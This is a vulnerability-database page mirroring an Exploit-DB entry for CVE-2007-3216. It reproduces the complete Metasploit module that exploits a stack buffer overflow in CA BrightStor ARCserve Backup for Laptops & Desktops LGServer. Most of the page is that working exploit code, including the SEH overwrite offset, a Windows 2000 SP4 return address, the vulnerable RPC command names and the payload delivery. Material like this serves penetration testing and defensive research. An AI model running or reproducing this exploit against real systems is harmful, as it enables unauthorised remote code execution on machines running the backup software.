Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)

🗓️ 04 Nov 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 44 Views

CA BrightStor ARCserve Backup Stack Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Remote Vulnerabilities
13 Aug 201300:00
nessus
Circl		CVE-2007-3216
3 Nov 201000:00
circl
Check Point Advisories		IPS-1 Protection Update for Various Enterprise Products (enterprisesoftware Version 1)
24 Oct 200700:00
checkpoint_advisories
Check Point Advisories		CA ARCserve Backup for Laptops and Desktops LGServer Buffer Overflows (CVE-2007-3216)
5 Nov 200900:00
checkpoint_advisories
CVE		CVE-2007-3216
14 Jun 200722:00
cve
Cvelist		CVE-2007-3216
14 Jun 200722:00
cvelist
Exploit DB		CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (2)
3 Nov 201000:00
exploitdb
Exploit DB		CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Remote Buffer Overflow (Metasploit)
10 Mar 201100:00
exploitdb
Metasploit		CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow
4 Nov 201022:19
metasploit
Metasploit		CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow
4 Nov 201001:51
metasploit
Rows per page
##
# $Id: lgserver_multi.rb 10909 2010-11-04 23:59:56Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
				for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,
				an attacker could overflow the buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10909 $',
			'References'     =>
				[
					[ 'CVE', '2007-3216' ],
					[ 'OSVDB', '35329' ],
					[ 'BID', '24348' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'  =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x75022ac4 } ],
				],
			'DisclosureDate' => 'Jun 6 2007',
			'DefaultTarget' => 0))

		register_options([ Opt::RPORT(1900) ], self.class)
	end

	def check

		connect

		sock.put("0000000019rxrGetServerVersion")
		ver = sock.get_once

		disconnect

		if ( ver =~ /11.1.742/ )
				return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe

	end

	def exploit

		connect

		rpc_commands = [
				"rxsAddNewUser",
				"rxsSetUserInfo",
				"rxsRenameUser",
				"rxsExportData",
				"rxcReadSaveSetProfile",
				"rxcInitSaveSetProfile",
				"rxcAddSaveSetNextAppList",
				"rxcAddSaveSetNextFilesPathList"
			]

		rpc_command = rpc_commands[rand(rpc_commands.length)]

		data = rand_text_alpha_upper(62768)

		data[58468,8] = generate_seh_record(target.ret)
		data[58476,payload.encoded.length] = payload.encoded

		sploit  = "0000062768"				# Command Length Field
		sploit << rpc_command				# RPC Command
		sploit << "~~"					# Constant Argument Delimiter
		sploit << data

		print_status("Trying target #{target.name} with command '#{rpc_command}'...")
		sock.put(sploit)

		handler
		disconnect

	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Nov 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 210
EPSS0.64283
ca brightstorarcserve backupbuffer overflowlaptopsdesktopsstack
44